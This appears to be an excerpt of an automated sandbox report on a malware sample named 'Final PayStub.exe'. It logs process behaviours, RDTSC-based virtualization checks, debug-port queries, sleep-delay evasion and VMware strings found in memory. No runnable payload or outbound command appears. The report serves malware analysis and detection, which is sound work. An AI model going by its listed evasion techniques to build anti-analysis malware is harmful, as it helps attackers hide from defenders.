Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105D0774
Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105CD8A4
Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105CDA44
Source: C:\Users\user\Desktop\Final PayStub.exe	API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105D0774
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD944
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD504
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD544
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CD8A4
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FF9105CDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Final PayStub.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Final PayStub.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 2BA9904 second address: 2BA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 2BA9B7E second address: 2BA9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: 8860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: 9860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: 9A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Memory allocated: AA60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Users\user\Desktop\Final PayStub.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5539	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3845	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 569	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9357	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 882	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 700	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 9271	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-13792

Source: C:\Users\user\Desktop\Final PayStub.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\systray.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\Final PayStub.exe TID: 6784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4168	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5972	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep count: 569 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep time: -1138000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep count: 9357 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7364	Thread sleep time: -18714000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7276	Thread sleep count: 700 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7276	Thread sleep time: -1400000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7276	Thread sleep count: 9271 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7276	Thread sleep time: -18542000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: svchost.exe, 0000000E.00000002.2468196083.000001C6A0213000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.2474243563.00000000070CF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000n
Source: explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Final PayStub.exe, 00000000.00000002.1252075535.00000000085D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d
Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.2468596538.000001C6A0264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000E.00000002.2468078457.000001C6A0202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: explorer.exe, 00000007.00000002.2476642656.00000000091E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1256622166.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000007.00000000.1256622166.0000000009315000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.0000000009315000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\MP
Source: svchost.exe, 0000000E.00000002.2468731792.000001C6A028E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.2476642656.0000000009430000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000l
Source: svchost.exe, 0000000E.00000002.2468407903.000001C6A024B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1245900996.0000000000963000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000E.00000002.2468596538.000001C6A0264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:\sys
Source: explorer.exe, 00000007.00000002.2476642656.0000000009430000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1245900996.0000000000963000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1256622166.000000000955C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Users\user\Desktop\Final PayStub.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Users\user\Desktop\Final PayStub.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01414144 mov eax, dword ptr fs:[00000030h]	6_2_01414144
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01414144 mov eax, dword ptr fs:[00000030h]	6_2_01414144
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01414144 mov ecx, dword ptr fs:[00000030h]	6_2_01414144
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01414144 mov eax, dword ptr fs:[00000030h]	6_2_01414144
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01414144 mov eax, dword ptr fs:[00000030h]	6_2_01414144
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01418158 mov eax, dword ptr fs:[00000030h]	6_2_01418158
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B0124 mov eax, dword ptr fs:[00000030h]	6_2_013B0124
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov ecx, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov ecx, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov ecx, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov eax, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E10E mov ecx, dword ptr fs:[00000030h]	6_2_0142E10E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01440115 mov eax, dword ptr fs:[00000030h]	6_2_01440115
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142A118 mov ecx, dword ptr fs:[00000030h]	6_2_0142A118
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142A118 mov eax, dword ptr fs:[00000030h]	6_2_0142A118
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142A118 mov eax, dword ptr fs:[00000030h]	6_2_0142A118
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142A118 mov eax, dword ptr fs:[00000030h]	6_2_0142A118
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137C156 mov eax, dword ptr fs:[00000030h]	6_2_0137C156
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386154 mov eax, dword ptr fs:[00000030h]	6_2_01386154
